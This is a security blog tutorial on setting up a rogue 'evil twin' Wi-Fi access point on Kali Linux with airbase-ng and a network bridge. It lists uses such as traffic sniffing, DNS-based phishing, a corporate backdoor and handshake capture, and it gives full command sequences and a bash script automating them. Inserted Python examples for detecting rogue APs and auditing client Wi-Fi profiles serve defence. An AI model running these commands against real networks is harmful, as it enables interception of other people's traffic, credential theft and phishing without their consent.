Rogue Access Point using Kali Linux
GoSecure! blog (https://www.gosecure.it/blog), by MyDear(root)Shell, Fri, 20 Sep 2013 10:07:44 +0000
https://www.gosecure.it/blog/art/376/note/rougue-access-point-using-kali-linux/

A Rogue Access Point (RAP) is a fake Wi-Fi access point that can be used to sniff the traffic of anyone who connects to it.
Basically you have a PC (Kali Linux live in this case) with two interfaces: a wired one (eth0) connected to a working network and a wireless one (wlan0).
The wireless card will be configured as an Access Point (AP) and a bridge will be created to link the wired and wireless connections.
When a user connects to the new hot spot, his data are bridged through the PC to the wired connection and forwarded to the destination (the internet).
I use the airbase-ng command (aircrack-ng suite) for these operations.

Some scenarios:
Sniffing traffic
I set up a RAP and start Wireshark, ettercap or another network sniffer. Every connection that passes through my PC is intercepted.
Phishing
I set up a RAP and force it to use my DNS server. If someone connects to it and starts to surf, I am able to redirect traffic using my DNS. In this case I can implement some kind of phishing.
Company network back door
I set up, maybe using a small Raspberry Pi, an access point using the company network as the wired interface. This is a hot spot directly connected to the company LAN.
Caffè-Latte attack
Looking at the wireless packets you can see the client trying to connect to a previously registered access point (e.g. MY_NETWORK). I can set up an access point using the same SSID the client is searching for. When the client, which is searching for a known SSID, finds my RAP named MY_NETWORK, it immediately tries to connect. I can use this connection to sniff WPA handshakes or WEP packets and try to decode the passwords.
Extend my connection
I have a notebook connected to a LAN but no access point. I also have a smartphone and I want a wireless connection on the fly.
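
The defender's counterpart to the evil-twin scenario above, as an added example that is not part of the original post: a Python script that parses "iw dev wlan0 scan" output and flags any BSS that advertises one of your SSIDs from a BSSID you do not operate, or with weaker security than you expect (for instance the WEP or open clone set up with airbase-ng). The scan text, the KNOWN_APS allowlist and the function names are constructed for this example.

```python
import re

# Constructed sample of "iw dev wlan0 scan" output (not a real capture; indentation
# simplified). It contains the corporate SSID from its legitimate BSSID with WPA2,
# the same SSID from an unknown BSSID using WEP (the clone the post describes),
# and a guest SSID that shows up as an open network.
SAMPLE_SCAN = """\
BSS 00:11:22:33:44:55(on wlan0)
    freq: 2462
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -48.00 dBm
    SSID: MY_NETWORK
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
BSS 66:77:88:99:aa:bb(on wlan0)
    freq: 2462
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -30.00 dBm
    SSID: MY_NETWORK
BSS cc:dd:ee:ff:00:11(on wlan0)
    freq: 2437
    capability: ESS ShortSlotTime (0x0401)
    signal: -60.00 dBm
    SSID: Guest
"""

# Assumed baseline of the access points the organisation really operates.
KNOWN_APS = {
    "MY_NETWORK": {"bssids": {"00:11:22:33:44:55"}, "security": "WPA2"},
    "Guest": {"bssids": {"cc:dd:ee:ff:00:11"}, "security": "WPA2"},
}

BSS_LINE = re.compile(r"^BSS ([0-9a-f]{2}(?::[0-9a-f]{2}){5})")


def parse_scan(text):
    """Turn iw scan output into one dict per BSS: bssid, ssid, signal, security.

    Security is derived the way iw exposes it: an RSN element means WPA2, a WPA
    element means WPA, the Privacy capability bit alone means WEP, none means open.
    """
    networks = []
    cur = None
    for line in text.splitlines():
        m = BSS_LINE.match(line)
        if m:
            cur = {"bssid": m.group(1).lower(), "ssid": "", "signal": None,
                   "privacy": False, "rsn": False, "wpa": False}
            networks.append(cur)
            continue
        if cur is None:
            continue
        s = line.strip()
        if s.startswith("SSID:"):
            cur["ssid"] = s[len("SSID:"):].strip()
        elif s.startswith("capability:"):
            cur["privacy"] = " Privacy" in s
        elif s.startswith("RSN:"):
            cur["rsn"] = True
        elif s.startswith("WPA:"):
            cur["wpa"] = True
        elif s.startswith("signal:"):
            cur["signal"] = float(s.split()[1])
    for n in networks:
        if n["rsn"]:
            n["security"] = "WPA2"
        elif n["wpa"]:
            n["security"] = "WPA"
        elif n["privacy"]:
            n["security"] = "WEP"
        else:
            n["security"] = "OPEN"
    return networks


def find_rogues(networks, known=KNOWN_APS):
    """Return (bssid, ssid, reason) for every BSS that impersonates a known SSID."""
    findings = []
    for n in networks:
        base = known.get(n["ssid"])
        if base is None:
            continue  # a name we do not operate is not a clone of ours
        if n["bssid"] not in base["bssids"]:
            findings.append((n["bssid"], n["ssid"], "unknown BSSID for a known SSID"))
        if n["security"] != base["security"]:
            findings.append((n["bssid"], n["ssid"],
                             "security %s, expected %s" % (n["security"], base["security"])))
    return findings


if __name__ == "__main__":
    for bssid, ssid, reason in find_rogues(parse_scan(SAMPLE_SCAN)):
        print("ROGUE? %s '%s': %s" % (bssid, ssid, reason))
```

Run periodically from a sensor host on each floor and compare against a BSSID inventory from your controller; a clone that copies both the name and the security type still shows up through the unknown BSSID, while a signal far stronger than the real AP's at that location is the usual hint that it sits in the same room.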

The basic configuration:
– eth0, the wired connection linked to the network
– a DHCP server working on the LAN where eth0 is connected
– wlan0, a wireless interface that can be put into monitor mode

I start monitor mode on wlan0:

root@kali:~# airmon-ng start wlan0

This will create the mon0 interface.
Now I set up an AP on mon0, named “MY_network”, on channel 11 with WEP authentication. I can also set it up as a free Wi-Fi network without a password (see airbase-ng --help).

root@kali:~# airbase-ng --essid MY_network -c 11 -w abcdefabcdefabcdefabcdef12 mon0

This will create the at0 interface.
Now that the AP is started, in another terminal window I create a bridge named test-bridge and link at0 to eth0 using bridge-utils. Note that in Kali Linux bridge-utils has to be installed (apt-get install bridge-utils) in order to use the brctl command.

root@kali:~# brctl addbr test-bridge
root@kali:~# brctl addif test-bridge eth0
root@kali:~# brctl addif test-bridge at0

I can release the IPs of eth0 and at0, because the two interfaces are now part of the virtual bridge and don’t need an IP anymore:

root@kali:~# ifconfig eth0 down
root@kali:~# ifconfig eth0 0.0.0.0 up
root@kali:~# ifconfig at0 down
root@kali:~# ifconfig at0 0.0.0.0 up

I also need IP forwarding:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Finally I configure test-bridge. Unlike eth0 and at0, the bridge needs an IP address on the LAN where eth0 is connected.

root@kali:~# ifconfig test-bridge 192.168.x.y netmask 255.255.255.0 broadcast 192.168.x.255 up
root@kali:~# route add default gw 192.168.x.1

Note that these are temporary operations that will be discarded by rebooting the system.

Extra
Starting an AP to capture handshakes.

root@kali:~# airbase-ng -c 6 -e ESSID -z 2 -W 1 -F file.cap wlan0

-z sets WPA1 tags (2 = TKIP)
-W sets the WEP flag in beacons. -W 1 is recommended when using -z or -Z
-F the file in which to store the capture (.cap)
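
The Caffè-Latte scenario and the handshake-capturing AP above both depend on a client that still carries a profile for the cloned name. As an added example that is not part of the original post, here is a Python audit of a wpa_supplicant.conf that flags the client-side profiles such an AP can exploit: WEP and open networks, profiles with scan_ssid=1 (which make the client send probe requests naming the network) and EAP profiles without ca_cert. The configuration text and its secrets are constructed placeholders; the key names are wpa_supplicant's own.

```python
# Constructed wpa_supplicant.conf used as input (not from any real host); the
# network names and secrets are placeholders.
SAMPLE_CONF = """\
ctrl_interface=/run/wpa_supplicant
update_config=1

network={
    ssid="MY_NETWORK"
    proto=RSN
    key_mgmt=WPA-PSK
    psk="correct horse battery staple"
}

# stale profile from an old office: WEP, and the client probes for it actively
network={
    ssid="Old_Office"
    key_mgmt=NONE
    wep_key0=abcdefabcdefabcdefabcdef12
    wep_tx_keyidx=0
    scan_ssid=1
}

network={
    ssid="CafeFree"
    key_mgmt=NONE
}

network={
    ssid="CORP_EAP"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user"
    password="placeholder"
}
"""


def parse_networks(text):
    """Collect every network={ ... } block as a dict of key -> value (quotes stripped)."""
    networks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#"):          # wpa_supplicant comment line
            continue
        if line.startswith("network={"):
            cur = {}
        elif line == "}" and cur is not None:
            networks.append(cur)
            cur = None
        elif cur is not None and "=" in line:
            key, value = line.split("=", 1)
            cur[key.strip()] = value.strip().strip('"')
    return networks


def audit_profiles(networks):
    """Return (ssid, finding) pairs for profiles a same-name rogue AP can exploit."""
    findings = []
    for n in networks:
        ssid = n.get("ssid", "<no ssid>")
        key_mgmt = n.get("key_mgmt", "WPA-PSK WPA-EAP")   # wpa_supplicant's default
        if any(k.startswith("wep_key") for k in n):
            findings.append((ssid, "WEP profile: the client joins any AP advertising this "
                                   "name, and WEP keys are recoverable from captured traffic"))
        elif key_mgmt == "NONE":
            findings.append((ssid, "open profile: the client joins any AP advertising this name"))
        if n.get("scan_ssid") == "1":
            findings.append((ssid, "scan_ssid=1: the client sends probe requests naming this "
                                   "network, so it can be cloned on demand"))
        if "eap" in n and "ca_cert" not in n:
            findings.append((ssid, "EAP without ca_cert: the authentication server's "
                                   "certificate is not validated"))
    return findings


if __name__ == "__main__":
    for ssid, finding in audit_profiles(parse_networks(SAMPLE_CONF)):
        print("%-12s %s" % (ssid, finding))
```

The WPA-PSK profile produces no finding: a clone without the passphrase cannot complete the four-way handshake, although, as the Extra section shows, it can still record the client's half of it for offline guessing, which is why stale profiles and weak passphrases are worth removing rather than just noting.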

Here’s my old simple script to start a Rogue Access Point using Linux Bash. It may need some adjustment, but I think it will work.

#!/bin/bash
# Rogue AP helper. The prompts are in Italian as in the original; the English
# comments describe what each step does.
echo "---------------------------------------"
echo "Script per la creazione di un Rougue AP"
echo "---------------------------------------"
echo "Digita"
echo "  Per creare un Rougue AP per la cattura dell'handshake digita ----> 1"
echo "  Per creare un Rougue AP per condividere la connessione digita ---> 2"
# Menu: 1 = AP that writes the handshake to a capture file, 2 = AP bridged to eth0
read CHOSE1
if [ "${CHOSE1}" = "1" ]
then
# Start: AP for handshake capture
echo
echo "Creazione AP per cattura handshake"
echo
echo "Quale essid vuoi utilizzare?"                 # ESSID to advertise
read ESSID1
echo "Su quale canale vuoi che trasmetta (1-11)"    # channel
read CHAN1
echo "Il file con i pacchetti è salvato in /tmp/${ESSID1}.cap"   # capture file path
ifconfig wlan0 down
airmon-ng start wlan0
# Same options as the "Extra" command above. The monitor interface name depends
# on the driver (mon0 in the walkthrough above); adjust if needed.
airbase-ng -c "${CHAN1}" -e "${ESSID1}" -z 2 -W 1 -F "/tmp/${ESSID1}.cap" wlan0
# End: AP for handshake capture
read
elif [ "${CHOSE1}" = "2" ]
then
# Start: AP that shares the wired connection
echo
echo "Creazione AP per condivisione connessione"
echo
echo "Faccio partire la funzionalità di monitoring su wlan0"   # enabling monitor mode
ifconfig wlan0 down
airmon-ng start wlan0
echo "Creo un AP sull'interfaccia virtuale at0"
echo "Quale essid vuoi utilizzare?"                 # ESSID to advertise
read ESSID
echo "Su quale canale vuoi che trasmetta (1-11)"    # channel
read CHAN
echo "Impostare una password? (y/n)"                # set a (WEP) password?
read CHOSE2
    if [ "${CHOSE2}" = "y" ]
    then
    # airbase-ng keeps running in its own window; the fixed WEP key is the same one used above
    gnome-terminal --geometry 83x19 -x bash -c "
    echo 'La password è stata impostata di default WEP abcdefabcdefabcdefabcdef12'
    airbase-ng --essid '${ESSID}' -c ${CHAN} -w abcdefabcdefabcdefabcdef12 mon0"
    else
    echo "La password non è stata impostata"        # no password: open network
    gnome-terminal --geometry 83x19 -x bash -c "
    airbase-ng --essid '${ESSID}' -c ${CHAN} mon0"
    fi
# at0 exists only once airbase-ng is up in the other window; wait for it
sleep 2
# Bridge br0 joining eth0 and at0, then release their addresses (same steps as above)
echo "Creo l'interfaccia br0 bridge vi collego eth0 e at0"
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 at0
ifconfig eth0 down
ifconfig eth0 0.0.0.0 up
ifconfig at0 down
ifconfig at0 0.0.0.0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
# Address, netmask, broadcast and gateway for the new bridge interface
echo "Inserisci i dati per nuova interfaccia bridge creata"
echo -n "Indirizzo ip:"
read IP
echo -n "Netmask:"
read NETMASK
echo -n "Broadcast:"
read BROAD
echo -n "Gateway:"
read ROUTE
ifconfig br0 "${IP}" netmask "${NETMASK}" broadcast "${BROAD}" up
route add default gw "${ROUTE}"
# End: AP that shares the wired connection
read
else
echo "Scelta non corretta premere invio per uscire dal programma."   # invalid choice
read
fi